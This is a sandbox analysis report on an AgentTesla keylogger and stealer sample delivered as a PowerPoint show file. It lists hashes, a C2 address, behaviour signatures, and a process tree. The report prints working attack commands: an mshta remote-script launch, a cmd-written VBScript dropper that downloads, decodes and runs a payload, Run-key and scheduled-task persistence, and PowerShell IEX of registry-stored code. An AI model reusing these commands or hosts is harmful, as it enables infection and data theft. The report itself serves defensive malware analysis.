agenttesla | 8db5da6f4ee55565df9d436ab0052eaebab54a915929835e839c513e6c658e9f

General

Target

25.pps
Size

100KB
MD5

c30e4c2f1fa54d2ef33b728ab424eeb5
SHA1

78de8719ed871189a4a79f4d37b6f664dbd7ed29
SHA256

8db5da6f4ee55565df9d436ab0052eaebab54a915929835e839c513e6c658e9f
SHA512

03266e5d5f717c7042e45a0703771eb66d72bfd2751309c27ca9162c1924bca360cf9b49522ea93484fa6c9e4a5ac46d32dcec1b65e7e1396aacc6d0528b18e0

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

C2

http://103.133.105.179/3232/inc/62120b2819c6f4.php

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.exeping.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4036	880	MSHTA.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1232	880	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4128	880	ping.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4560-65-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral2/memory/4560-66-0x0000000000437DEE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

MSHTA.exeWScript.exePowershell.exe

flow	pid	process
32	4036	MSHTA.exe
34	4036	MSHTA.exe
36	4036	MSHTA.exe
38	4036	MSHTA.exe
39	4036	MSHTA.exe
41	4036	MSHTA.exe
43	4036	MSHTA.exe
48	4036	MSHTA.exe
50	4036	MSHTA.exe
52	4036	MSHTA.exe
54	4036	MSHTA.exe
55	4036	MSHTA.exe
57	688	WScript.exe
59	688	WScript.exe
66	3160	Powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

jsc.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MSHTA.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/300.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/300.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/300.html\"\", 0 : window.close\")"	MSHTA.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Powershell.exe

description pid process target process

PID 3160 set thread context of 4560 3160 Powershell.exe jsc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1392 4036 WerFault.exe MSHTA.exe

description	pid	process	target process
PID 3160 set thread context of 4560	3160	Powershell.exe	jsc.exe

pid	pid_target	process	target process
1392	4036	WerFault.exe	MSHTA.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winword.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3176 schtasks.exe

pid	process
3176	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

winword.exePOWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	winword.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

1232 ping.exe
4128 ping.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

880 POWERPNT.EXE
3576 winword.exe
3576 winword.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

pid	process
1232	ping.exe
4128	ping.exe

pid	process
880	POWERPNT.EXE
3576	winword.exe
3576	winword.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

WerFault.exePowershell.exejsc.exe

pid	process
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
1392	WerFault.exe
3160	Powershell.exe
3160	Powershell.exe
3160	Powershell.exe
4560	jsc.exe
4560	jsc.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

WerFault.exePowershell.exejsc.exe

description	pid	process
Token: SeDebugPrivilege	1392	WerFault.exe
Token: SeDebugPrivilege	3160	Powershell.exe
Token: SeIncreaseQuotaPrivilege	3160	Powershell.exe
Token: SeSecurityPrivilege	3160	Powershell.exe
Token: SeTakeOwnershipPrivilege	3160	Powershell.exe
Token: SeLoadDriverPrivilege	3160	Powershell.exe
Token: SeSystemProfilePrivilege	3160	Powershell.exe
Token: SeSystemtimePrivilege	3160	Powershell.exe
Token: SeProfSingleProcessPrivilege	3160	Powershell.exe
Token: SeIncBasePriorityPrivilege	3160	Powershell.exe
Token: SeCreatePagefilePrivilege	3160	Powershell.exe
Token: SeBackupPrivilege	3160	Powershell.exe
Token: SeRestorePrivilege	3160	Powershell.exe
Token: SeShutdownPrivilege	3160	Powershell.exe
Token: SeDebugPrivilege	3160	Powershell.exe
Token: SeSystemEnvironmentPrivilege	3160	Powershell.exe
Token: SeRemoteShutdownPrivilege	3160	Powershell.exe
Token: SeUndockPrivilege	3160	Powershell.exe
Token: SeManageVolumePrivilege	3160	Powershell.exe
Token: 33	3160	Powershell.exe
Token: 34	3160	Powershell.exe
Token: 35	3160	Powershell.exe
Token: 36	3160	Powershell.exe
Token: SeIncreaseQuotaPrivilege	3160	Powershell.exe
Token: SeSecurityPrivilege	3160	Powershell.exe
Token: SeTakeOwnershipPrivilege	3160	Powershell.exe
Token: SeLoadDriverPrivilege	3160	Powershell.exe
Token: SeSystemProfilePrivilege	3160	Powershell.exe
Token: SeSystemtimePrivilege	3160	Powershell.exe
Token: SeProfSingleProcessPrivilege	3160	Powershell.exe
Token: SeIncBasePriorityPrivilege	3160	Powershell.exe
Token: SeCreatePagefilePrivilege	3160	Powershell.exe
Token: SeBackupPrivilege	3160	Powershell.exe
Token: SeRestorePrivilege	3160	Powershell.exe
Token: SeShutdownPrivilege	3160	Powershell.exe
Token: SeDebugPrivilege	3160	Powershell.exe
Token: SeSystemEnvironmentPrivilege	3160	Powershell.exe
Token: SeRemoteShutdownPrivilege	3160	Powershell.exe
Token: SeUndockPrivilege	3160	Powershell.exe
Token: SeManageVolumePrivilege	3160	Powershell.exe
Token: 33	3160	Powershell.exe
Token: 34	3160	Powershell.exe
Token: 35	3160	Powershell.exe
Token: 36	3160	Powershell.exe
Token: SeDebugPrivilege	4560	jsc.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

880 POWERPNT.EXE
880 POWERPNT.EXE
3576 winword.exe
3576 winword.exe
3576 winword.exe

pid	process
880	POWERPNT.EXE
880	POWERPNT.EXE
3576	winword.exe
3576	winword.exe
3576	winword.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERPNT.EXEMSHTA.execmd.exePowershell.exe

description	pid	process	target process
PID 880 wrote to memory of 4036	880	POWERPNT.EXE	MSHTA.exe
PID 880 wrote to memory of 4036	880	POWERPNT.EXE	MSHTA.exe
PID 880 wrote to memory of 1232	880	POWERPNT.EXE	ping.exe
PID 880 wrote to memory of 1232	880	POWERPNT.EXE	ping.exe
PID 880 wrote to memory of 3576	880	POWERPNT.EXE	winword.exe
PID 880 wrote to memory of 3576	880	POWERPNT.EXE	winword.exe
PID 4036 wrote to memory of 3848	4036	MSHTA.exe	cmd.exe
PID 4036 wrote to memory of 3848	4036	MSHTA.exe	cmd.exe
PID 3848 wrote to memory of 688	3848	cmd.exe	WScript.exe
PID 3848 wrote to memory of 688	3848	cmd.exe	WScript.exe
PID 4036 wrote to memory of 3176	4036	MSHTA.exe	schtasks.exe
PID 4036 wrote to memory of 3176	4036	MSHTA.exe	schtasks.exe
PID 4036 wrote to memory of 3160	4036	MSHTA.exe	Powershell.exe
PID 4036 wrote to memory of 3160	4036	MSHTA.exe	Powershell.exe
PID 4036 wrote to memory of 3160	4036	MSHTA.exe	Powershell.exe
PID 880 wrote to memory of 4128	880	POWERPNT.EXE	ping.exe
PID 880 wrote to memory of 4128	880	POWERPNT.EXE	ping.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe
PID 3160 wrote to memory of 4560	3160	Powershell.exe	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:880

C:\Windows\SYSTEM32\MSHTA.exe
MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkokwaskdoaskdokkdl
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
PID:688

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/300.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:3176

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4036 -s 2896
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1232

C:\Program Files\Microsoft Office\Root\Office16\winword.exe
winword
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3576

C:\Windows\SYSTEM32\ping.exe
ping 127.0.0.1
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:4128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
50308e654d10f196ff97f70c8ae32be8

SHA1
44af0ff1918b729945b6b7052250f13cfe2e154a

SHA256
bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb

SHA512
ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
c9a852c59c41561e1dbf015f4a36569b

SHA1
880ca939178abe3937d99ee09fda70ea17b78354

SHA256
b10d818ec975707276d77326e36f2c0d686b37fc726ef5e03ff6e53b0c4c5fbc

SHA512
2fe322e8c99e9b9bcfca5d7543bfa6f52bc54c4e846abde777fc1a91ae37cc6bec2a860b73158fe3b5aa2b99b6b96dc473760da3114082d48ffeb5d0c8e8b3a7

Download Submit
C:\Users\Public\SiggiaW.vbs
MD5
49744d1b597f85a2691eeeccab3f5ec9

SHA1
53be659955bdf552d103ddd2251f97920c4830bd

SHA256
09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f

SHA512
7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f

Download Submit
memory/688-16-0x0000000000000000-mapping.dmp

Download
memory/880-4-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-5-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-6-0x00007FF941E60000-0x00007FF942497000-memory.dmp

Filesize
6.2MB

Download
memory/880-23-0x00007FF9424A0000-0x00007FF94407D000-memory.dmp

Filesize
27.9MB

Download
memory/880-3-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-2-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-31-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-30-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-29-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/880-28-0x00007FF920240000-0x00007FF920250000-memory.dmp

Filesize
64KB

Download
memory/1232-8-0x0000000000000000-mapping.dmp

Download
memory/1392-20-0x0000023A16370000-0x0000023A16371000-memory.dmp

Filesize
4KB

Download
memory/3160-34-0x0000000007420000-0x0000000007421000-memory.dmp

Filesize
4KB

Download
memory/3160-41-0x0000000008C00000-0x0000000008C01000-memory.dmp

Filesize
4KB

Download
memory/3160-25-0x0000000006DF0000-0x0000000006DF1000-memory.dmp

Filesize
4KB

Download
memory/3160-22-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/3160-26-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/3160-27-0x0000000000CE2000-0x0000000000CE3000-memory.dmp

Filesize
4KB

Download
memory/3160-64-0x0000000007A50000-0x0000000007A56000-memory.dmp

Filesize
24KB

Download
memory/3160-62-0x000000000A510000-0x000000000A511000-memory.dmp

Filesize
4KB

Download
memory/3160-60-0x000000000A520000-0x000000000A521000-memory.dmp

Filesize
4KB

Download
memory/3160-59-0x000000007F080000-0x000000007F081000-memory.dmp

Filesize
4KB

Download
memory/3160-32-0x0000000006BE0000-0x0000000006BE1000-memory.dmp

Filesize
4KB

Download
memory/3160-33-0x0000000006D80000-0x0000000006D81000-memory.dmp

Filesize
4KB

Download
memory/3160-58-0x000000000A430000-0x000000000A431000-memory.dmp

Filesize
4KB

Download
memory/3160-35-0x0000000007670000-0x0000000007671000-memory.dmp

Filesize
4KB

Download
memory/3160-36-0x0000000007550000-0x0000000007551000-memory.dmp

Filesize
4KB

Download
memory/3160-37-0x0000000007DE0000-0x0000000007DE1000-memory.dmp

Filesize
4KB

Download
memory/3160-57-0x0000000007A50000-0x0000000007A51000-memory.dmp

Filesize
4KB

Download
memory/3160-18-0x0000000000000000-mapping.dmp

Download
memory/3160-40-0x0000000007FE0000-0x0000000007FE1000-memory.dmp

Filesize
4KB

Download
memory/3160-24-0x0000000001140000-0x0000000001141000-memory.dmp

Filesize
4KB

Download
memory/3160-42-0x0000000009990000-0x0000000009991000-memory.dmp

Filesize
4KB

Download
memory/3160-43-0x00000000096F0000-0x00000000096F1000-memory.dmp

Filesize
4KB

Download
memory/3160-44-0x0000000009740000-0x0000000009741000-memory.dmp

Filesize
4KB

Download
memory/3160-45-0x0000000009F30000-0x0000000009F31000-memory.dmp

Filesize
4KB

Download
memory/3160-46-0x000000000AAB0000-0x000000000AAB1000-memory.dmp

Filesize
4KB

Download
memory/3160-47-0x0000000000CE3000-0x0000000000CE4000-memory.dmp

Filesize
4KB

Download
memory/3160-49-0x0000000009EB0000-0x0000000009EE3000-memory.dmp

Filesize
204KB

Download
memory/3176-17-0x0000000000000000-mapping.dmp

Download
memory/3576-9-0x0000000000000000-mapping.dmp

Download
memory/3576-13-0x00007FF941E60000-0x00007FF942497000-memory.dmp

Filesize
6.2MB

Download
memory/3848-15-0x0000000000000000-mapping.dmp

Download
memory/4036-7-0x0000000000000000-mapping.dmp

Download
memory/4128-21-0x0000000000000000-mapping.dmp

Download
memory/4560-65-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/4560-66-0x0000000000437DEE-mapping.dmp

Download
memory/4560-67-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/4560-71-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/4560-72-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/4560-73-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/4560-75-0x0000000006490000-0x0000000006491000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads